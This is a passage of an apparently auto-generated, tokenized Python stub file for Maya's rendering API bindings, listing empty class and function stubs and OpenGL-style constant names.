<EOL> pixelAspectRatio = None <EOL> postMel = None <EOL> postRenderLayerMel = None <EOL> postRenderMel = None <EOL> preMel = None <EOL> preRenderLayerMel = None <EOL> preRenderMel = None <EOL> renderAll = None <EOL> renumberBy = None <EOL> renumberFrames = None <EOL> renumberStart = None <EOL> skipExistingFrames = None <EOL> thisown = None <EOL> useCustomExt = None <EOL> width = None <EOL> __swig_destroy__ = None <EOL> kFullPathImage = <NUM_LIT:1> <EOL> kFullPathTmp = <NUM_LIT:2> <EOL> kRelativePath = <NUM_LIT:0> <EOL> class 
MFnRenderPass ( OpenMaya . MFnDependencyNode ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def customTokenString ( * args , ** kwargs ) : <EOL> pass <EOL> def frameBufferChannels ( * args , ** kwargs ) : <EOL> pass <EOL> def frameBufferType ( * args , ** kwargs ) : <EOL> pass <EOL> def getImplementation ( * args , ** kwargs ) : <EOL> pass <EOL> def passID ( * args , ** kwargs ) : <EOL> pass <EOL> def setImplementation ( * args , ** kwargs ) : <EOL> pass <EOL> def usesFiltering ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MFnImageSource ( OpenMaya . MFnDependencyNode ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getImageName ( * args , ** kwargs ) : <EOL> pass <EOL> def sourceCamera ( * args , ** kwargs ) : <EOL> pass <EOL> def sourceLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MLightLinks ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getIgnoredLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getIgnoredObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def getLinkedLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getLinkedObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowIgnoredLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowIgnoredObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowLinkedLights ( * args , ** kwargs ) : <EOL> pass <EOL> def getShadowLinkedObjects ( * args , ** kwargs ) : <EOL> pass <EOL> def parseLinks ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MVaryingParameterList ( _object ) : <EOL> def __init__ ( 
self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def append ( * args , ** kwargs ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def getElement ( * args , ** kwargs ) : <EOL> pass <EOL> def length ( * args , ** kwargs ) : <EOL> pass <EOL> def setElement ( * args , ** kwargs ) : <EOL> pass <EOL> def setLength ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class RV_PIXEL ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> a = None <EOL> b = None <EOL> g = None <EOL> r = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MRenderingInfo ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def cameraPath ( * args , ** kwargs ) : <EOL> pass <EOL> def height ( * args , ** kwargs ) : <EOL> pass <EOL> def originX ( * args , ** kwargs ) : <EOL> pass <EOL> def originY ( * args , ** kwargs ) : <EOL> pass <EOL> def projectionMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def renderTarget ( * args , ** kwargs ) : <EOL> pass <EOL> def renderingAPI ( * args , ** kwargs ) : <EOL> pass <EOL> def renderingVersion ( * args , ** kwargs ) : <EOL> pass <EOL> def viewMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def width ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> class MRenderProfile ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def hasRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def numberOfRenderers ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> kMayaD3D = 
<NUM_LIT:2> <EOL> kMayaOpenGL = <NUM_LIT:1> <EOL> kMayaSoftware = <NUM_LIT:0> <EOL> class MUniformParameterList ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def append ( * args , ** kwargs ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def getElement ( * args , ** kwargs ) : <EOL> pass <EOL> def length ( * args , ** kwargs ) : <EOL> pass <EOL> def setElement ( * args , ** kwargs ) : <EOL> pass <EOL> def setLength ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MHwrCallback ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def deviceDeleted ( * args , ** kwargs ) : <EOL> pass <EOL> def deviceLost ( * args , ** kwargs ) : <EOL> pass <EOL> def deviceNew ( * args , ** kwargs ) : <EOL> pass <EOL> def deviceReset ( * args , ** kwargs ) : <EOL> pass <EOL> def addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MHwTextureManager ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def deregisterTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def glBind ( * args , ** kwargs ) : <EOL> pass <EOL> def registerTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def textureFile ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> def MViewportRenderer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_diffuseReflectance ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_startRender 
( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_setattr ( self , class_type , name , value ) : <EOL> pass <EOL> def MSwatchRenderRegister_registerSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_hemisphereCoverage ( * args , ** kwargs ) : <EOL> pass <EOL> def MD3D9Renderer_theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_getattr ( self , class_type , name ) : <EOL> pass <EOL> def MHwTextureManager_className ( * args , ** kwargs ) : <EOL> pass <EOL> def RV_PIXEL_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_raytraceFirstGeometryIntersections ( * args , ** kwargs ) : <EOL> pass <EOL> def MHardwareRenderer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderCallback_addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometry_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGLFunctionTable_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MUniformParameterList_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_exactFileTextureName ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MVaryingParameter_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_renderPass ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwrCallback_removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderingInfo_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_findLayerByName ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_defaultRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def MLightLinks_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_listAllRenderLayers ( * args , ** kwargs ) : <EOL> pass <EOL> 
def MRenderUtil_maximumSpecularReflection ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_startRegionRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_currentLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_deregisterTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_relativeFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderLayer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MSwatchRenderRegister_unregisterSwatchRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryData_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_sendRenderProgressInfo ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_lightAttenuation ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderPass_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderTarget_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MSwatchRenderRegister_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_className ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_setattr_nondynamic_method ( set ) : <EOL> pass <EOL> def MRenderProfile_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderData_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_eval2dTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_sampleShadingNetwork ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderCallback_removeCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_getPreRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryPrimitive_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_getGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnRenderPass_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_mainBeautyPassCustomTokenString ( * args , ** kwargs ) : <EOL> pass <EOL> 
def MRenderView_setCurrentCamera ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwrCallback_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MSwatchRenderBase_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryRequirements_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MD3D9Renderer_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MHardwareRenderer_theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_updatePixels ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_doesRenderEditorExist ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_registerTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_textureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_getCommonRenderSettings ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_convertPsdFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_mayaRenderState ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_renderObjectItem ( * args , ** kwargs ) : <EOL> pass <EOL> def weakref_proxy ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def MVaryingParameterList_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnImageSource_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_generatingIprFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_getPostRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_setattr_nondynamic ( self , class_type , name , value , static = <NUM_LIT:1> ) : <EOL> pass <EOL> def MGeometryManager_referenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def RV_AOV_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnImageSource_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderShadowData_swigregister ( 
* args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_mainBeautyPassName ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_getRenderRegion ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_endRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_refresh ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_glBind ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_raytrace ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryList_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_repr ( self ) : <EOL> pass <EOL> def MRenderUtil_exactImagePlaneFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderCallback_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MDrawProcedureBase_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_dereferenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_inCurrentRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwrCallback_addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MUniformParameter_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> MGL_RENDERBUFFER_STENCIL_SIZE = <NUM_LIT> <EOL> MGL_LUMINANCE6_ALPHA2 = <NUM_LIT> <EOL> MGL_OPERAND3_ALPHA_NV = <NUM_LIT> <EOL> kMGLext_ARB_point_parameters = <NUM_LIT:30> <EOL> MGL_REG_16_ATI = <NUM_LIT> <EOL> MGL_DOT3_RGB_EXT = <NUM_LIT> <EOL> MGL_RENDERBUFFER_DEPTH_SIZE = <NUM_LIT> <EOL> MGL_OPERAND3_RGB_NV = <NUM_LIT> <EOL> MGL_REG_15_ATI = <NUM_LIT> <EOL> MGL_RENDERBUFFER_ALPHA_SIZE = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA_S3TC_DXT1_EXT = <NUM_LIT> <EOL> MGL_LEFT = <NUM_LIT> <EOL> MGL_ALPHA_BITS = <NUM_LIT> <EOL> MGL_VIEWPORT_BIT = <NUM_LIT> <EOL> MGL_STACK_OVERFLOW = <NUM_LIT> <EOL> MGL_RENDERBUFFER_BLUE_SIZE = <NUM_LIT> <EOL> MGL_NEAREST = <NUM_LIT> <EOL> MGL_INVALID_OPERATION = <NUM_LIT> <EOL> kMGLext_ATI_pixel_format_float = <NUM_LIT> <EOL> MGL_RENDERBUFFER_GREEN_SIZE = 
<NUM_LIT> <EOL> MGL_PROXY_TEXTURE_CUBE_MAP = <NUM_LIT> <EOL> MGL_COMBINE4_NV = <NUM_LIT> <EOL> MGL_INVALID_VALUE = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX_NV = <NUM_LIT> <EOL> MGL_RENDERBUFFER_RED_SIZE = <NUM_LIT> <EOL> MGL_RED_BITS = <NUM_LIT> <EOL> MGL_POINT_FADE_THRESHOLD_SIZE_ARB = <NUM_LIT> <EOL> MGL_REG_11_ATI = <NUM_LIT> <EOL> MGL_STENCIL_INDEX16 = <NUM_LIT> <EOL> MGL_LUMINANCE4_ALPHA4 = <NUM_LIT> <EOL> MGL_INDEX_BITS = <NUM_LIT> <EOL> MGL_AUX3 = <NUM_LIT> <EOL> MGL_DOT3_RGB_ARB = <NUM_LIT> <EOL> MGL_STENCIL_INDEX8 = <NUM_LIT> <EOL> MGL_OPERAND0_ALPHA_EXT = <NUM_LIT> <EOL> MGL_VARIANT_DATATYPE_EXT = <NUM_LIT> <EOL> MGL_ACCUM_ALPHA_BITS = <NUM_LIT> <EOL> MGL_REG_9_ATI = <NUM_LIT> <EOL> MGL_STENCIL_INDEX4 = <NUM_LIT> <EOL> MGL_DEPTH_BITS = <NUM_LIT> <EOL> MGL_MAX_CLIENT_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_AUX1 = <NUM_LIT> <EOL> MGL_STENCIL_INDEX1 = <NUM_LIT> <EOL> MGL_MAX_VIEWPORT_DIMS = <NUM_LIT> <EOL> MGL_UNSIGNED_NORMALIZED = <NUM_LIT> <EOL> MGL_REG_7_ATI = <NUM_LIT> <EOL> MGL_RENDERBUFFER_INTERNAL_FORMAT = <NUM_LIT> <EOL> MGL_STACK_UNDERFLOW = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_STACK_DEPTH = <NUM_LIT> <EOL> MGL_FRONT_AND_BACK = <NUM_LIT> <EOL> MGL_TEXTURE6 = <NUM_LIT> <EOL> MGL_PACK_IMAGE_HEIGHT_EXT = <NUM_LIT> <EOL> MGL_MAX_PROJECTION_STACK_DEPTH = <NUM_LIT> <EOL> MGL_MATRIX11 = <NUM_LIT> <EOL> MGL_PROGRAM_ERROR_STRING_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_ENABLED = <NUM_LIT> <EOL> MGL_4_BYTES = <NUM_LIT> <EOL> MGL_RENDERBUFFER_WIDTH = <NUM_LIT> <EOL> MGL_LUMINANCE16 = <NUM_LIT> <EOL> MGL_MAX_NAME_STACK_DEPTH = <NUM_LIT> <EOL> MGL_DOUBLE = <NUM_LIT> <EOL> MGL_COMPRESSED_TEXTURE_FORMATS_ARB = <NUM_LIT> <EOL> MGL_PACK_SKIP_IMAGES_EXT = <NUM_LIT> <EOL> MGL_AUX0 = <NUM_LIT> <EOL> MGL_SOURCE0_ALPHA_EXT = <NUM_LIT> <EOL> MGL_VARIANT_VALUE_EXT = <NUM_LIT> <EOL> MGL_HALF_FLOAT = <NUM_LIT> <EOL> MGL_PACK_SKIP_IMAGES = <NUM_LIT> <EOL> MGL_SOURCE3_ALPHA_NV = <NUM_LIT> <EOL> MGL_MAX_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_FRONT_LEFT = <NUM_LIT> <EOL> 
kMGLext_EXT_transform_feedback = <NUM_LIT> <EOL> MGL_STENCIL_ATTACHMENT = <NUM_LIT> <EOL> MGL_MAX_PIXEL_MAP_TABLE = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH_TYPE = <NUM_LIT> <EOL> MGL_FRONT_RIGHT = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_10_10_10_2_EXT = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_IMAGE_UNITS_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD18_EXT = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_SIZE = <NUM_LIT> <EOL> MGL_BACK_LEFT = <NUM_LIT> <EOL> MGL_TEXTURE5 = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_8_8_8_8_EXT = <NUM_LIT> <EOL> MGL_PREVIOUS_EXT = <NUM_LIT> <EOL> MGL_MATRIX10 = <NUM_LIT> <EOL> MGL_FRAGMENT_SHADER_ATI = <NUM_LIT> <EOL> MGL_UNSIGNED_SHORT_5_5_5_1_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE12 = <NUM_LIT> <EOL> MGL_PRIMARY_COLOR_EXT = <NUM_LIT> <EOL> kMGLext_imaging_subset = <NUM_LIT:20> <EOL> MGL_CLEAR = <NUM_LIT> <EOL> MGL_NUM_COMPRESSED_TEXTURE_FORMATS_ARB = <NUM_LIT> <EOL> MGL_UNSIGNED_SHORT_4_4_4_4_EXT = <NUM_LIT> <EOL> MGL_CONSTANT_EXT = <NUM_LIT> <EOL> MGL_TEXTURE30 = <NUM_LIT> <EOL> MGL_COMPILE_AND_EXECUTE = <NUM_LIT> <EOL> MGL_UNSIGNED_BYTE_3_3_2_EXT = <NUM_LIT> <EOL> MGL_BLUE_BITS = <NUM_LIT> <EOL> MGL_TEXTURE_3D_EXT = <NUM_LIT> <EOL> MGL_INTERPOLATE_EXT = <NUM_LIT> <EOL> MGL_INVARIANT_DATATYPE_EXT = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_FUNC_REVERSE_SUBTRACT_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_INTENSITY_TYPE = <NUM_LIT> <EOL> MGL_QUADRATIC_ATTENUATION = <NUM_LIT> <EOL> kMGLext_NVX_gpu_memory_info = <NUM_LIT> <EOL> MGL_FUNC_REVERSE_SUBTRACT = <NUM_LIT> <EOL> MGL_POINT_SIZE = <NUM_LIT> <EOL> MGL_RGB_SCALE_EXT = <NUM_LIT> <EOL> MGL_ALPHA_BIAS = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_LINEAR_ATTENUATION = <NUM_LIT> <EOL> MGL_MATRIX6_NV = <NUM_LIT> <EOL> MGL_FUNC_SUBTRACT_EXT = <NUM_LIT> <EOL> MGL_CULL_FACE = <NUM_LIT> <EOL> MGL_COMBINE_ALPHA_EXT = <NUM_LIT> <EOL> MGL_CLIP_VOLUME_CLIPPING_HINT_EXT = <NUM_LIT> <EOL> MGL_INT = <NUM_LIT> <EOL> MGL_TEXTURE1_ARB = <NUM_LIT> <EOL> MGL_FUNC_SUBTRACT = <NUM_LIT> <EOL> MGL_LUMINANCE8 
= <NUM_LIT> <EOL> MGL_COMBINE_RGB_EXT = <NUM_LIT> <EOL> MGL_SPOT_CUTOFF = <NUM_LIT> <EOL> MGL_FILL = <NUM_LIT> <EOL> MGL_TEXTURE_BLUE_SIZE = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY5_NV = <NUM_LIT> <EOL> MGL_BLEND_EQUATION_EXT = <NUM_LIT> <EOL> MGL_COMBINE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE29 = <NUM_LIT> <EOL> MGL_SPOT_EXPONENT = <NUM_LIT> <EOL> kMGLext_NV_transform_feedback = <NUM_LIT> <EOL> MGL_DYNAMIC_COPY_ARB = <NUM_LIT> <EOL> MGL_BLEND_EQUATION = <NUM_LIT> <EOL> MGL_GREEN_BITS = <NUM_LIT> <EOL> MGL_EMBOSS_MAP_NV = <NUM_LIT> <EOL> MGL_2_BYTES = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_pixel_format = <NUM_LIT> <EOL> MGL_MAX_EXT = <NUM_LIT> <EOL> kMGLext_ATI_fragment_shader = <NUM_LIT> <EOL> MGL_UNPACK_IMAGE_HEIGHT = <NUM_LIT> <EOL> MGL_EMBOSS_CONSTANT_NV = <NUM_LIT> <EOL> MGL_TEXTURE_LUMINANCE_TYPE = <NUM_LIT> <EOL> MGL_LOCAL_CONSTANT_DATATYPE_EXT = <NUM_LIT> <EOL> MGL_POSITION = <NUM_LIT> <EOL> MGL_LERP_ATI = <NUM_LIT> <EOL> MGL_REG_12_ATI = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE_ALPHA = <NUM_LIT> <EOL> MGL_EMBOSS_LIGHT_NV = <NUM_LIT> <EOL> MGL_SPECULAR = <NUM_LIT> <EOL> MGL_TEXTURE3 = <NUM_LIT> <EOL> MGL_MIN_EXT = <NUM_LIT> <EOL> MGL_PRIMITIVE_RESTART_INDEX_NV = <NUM_LIT> <EOL> MGL_MATRIX8 = <NUM_LIT> <EOL> kMGLext_ARB_texture_env_crossbar = <NUM_LIT> <EOL> MGL_DIFFUSE = <NUM_LIT> <EOL> kMGLext_MGLX_destroy_window = <NUM_LIT> <EOL> MGL_DOT4_ATI = <NUM_LIT> <EOL> MGL_LUMINANCE4 = <NUM_LIT> <EOL> MGL_PRIMITIVE_RESTART_NV = <NUM_LIT> <EOL> MGL_AMBIENT = <NUM_LIT> <EOL> MGL_CON_5_ATI = <NUM_LIT> <EOL> MGL_FUNC_ADD_EXT = <NUM_LIT> <EOL> MGL_COMBINER7_NV = <NUM_LIT> <EOL> MGL_TEXTURE28 = <NUM_LIT> <EOL> MGL_LIGHT7 = <NUM_LIT> <EOL> MGL_SUB_ATI = <NUM_LIT> <EOL> MGL_OPERAND2_ALPHA_EXT = <NUM_LIT> <EOL> MGL_COMBINER6_NV = <NUM_LIT> <EOL> MGL_LIGHT6 = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_pbuffer = <NUM_LIT> <EOL> MGL_BLEND_COLOR_EXT = <NUM_LIT> <EOL> MGL_COMBINER5_NV = <NUM_LIT> <EOL> MGL_TEXTURE_ALPHA_TYPE = <NUM_LIT> <EOL> MGL_LIGHT5 = <NUM_LIT> <EOL> 
kMGLext_ARB_fragment_program_shadow = <NUM_LIT> <EOL> MGL_ADD_ATI = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_COMBINER4_NV = <NUM_LIT> <EOL> MGL_LIGHT4 = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_ALPHA_EXT = <NUM_LIT> <EOL> MGL_LINE_RESET_TOKEN = <NUM_LIT> <EOL> MGL_COMBINER3_NV = <NUM_LIT> <EOL> MGL_MATRIX7 = <NUM_LIT> <EOL> MGL_LIGHT3 = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_ALPHA = <NUM_LIT> <EOL> MGL_MIRROR_CLAMP_ATI = <NUM_LIT> <EOL> MGL_COMBINER2_NV = <NUM_LIT> <EOL> MGL_LIGHT2 = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_TWO_SIDE = <NUM_LIT> <EOL> MGL_CON_30_ATI = <NUM_LIT> <EOL> MGL_TEXTURE27 = <NUM_LIT> <EOL> MGL_LIGHT1 = <NUM_LIT> <EOL> MGL_UNSIGNED_INT = <NUM_LIT> <EOL> MGL_CON_29_ATI = <NUM_LIT> <EOL> MGL_OPERAND1_ALPHA_EXT = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_S8_S8_8_8_REV_NV = <NUM_LIT> <EOL> MGL_LIGHT0 = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_COLOR_EXT = <NUM_LIT> <EOL> MGL_EYE_LINEAR = <NUM_LIT> <EOL> MGL_NICEST = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_COLOR = <NUM_LIT> <EOL> MGL_REG_10_ATI = <NUM_LIT> <EOL> MGL_FASTEST = <NUM_LIT> <EOL> MGL_CON_26_ATI = <NUM_LIT> <EOL> MGL_MATRIX6 = <NUM_LIT> <EOL> MGL_FRAGMENT_PROGRAM_BINDING_NV = <NUM_LIT> <EOL> MGL_DONT_CARE = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR = <NUM_LIT> <EOL> MGL_TEXTURE_MAG_SIZE_NV = <NUM_LIT> <EOL> MGL_TEXTURE_BORDER = <NUM_LIT> <EOL> MGL_MAX_VARYING_FLOATS_ARB = <NUM_LIT> <EOL> MGL_CON_24_ATI = <NUM_LIT> <EOL> MGL_TEXTURE26 = <NUM_LIT> <EOL> MGL_TEXTURE_BORDER_COLOR = <NUM_LIT> <EOL> MGL_CON_23_ATI = <NUM_LIT> <EOL> MGL_SUBPIXEL_BITS = <NUM_LIT> <EOL> MGL_TEXTURE_INTERNAL_FORMAT = <NUM_LIT> <EOL> MGL_PIXEL_MAP_A_TO_A = <NUM_LIT> <EOL> kMGLext_texture_compression_s3tc = <NUM_LIT> <EOL> MGL_POLYGON = <NUM_LIT:9> <EOL> MGL_MAX_COLOR_ATTACHMENTS = <NUM_LIT> <EOL> MGL_TEXTURE_HEIGHT = <NUM_LIT> <EOL> MGL_BIAS_BIT_ATI = <NUM_LIT:8> <EOL> MGL_AUX2 = <NUM_LIT> <EOL> MGL_TEXTURE_WIDTH = <NUM_LIT> <EOL> MGL_QUADS = <NUM_LIT:7> <EOL> MGL_SAMPLE_COVERAGE_INVERT_ARB = <NUM_LIT> 
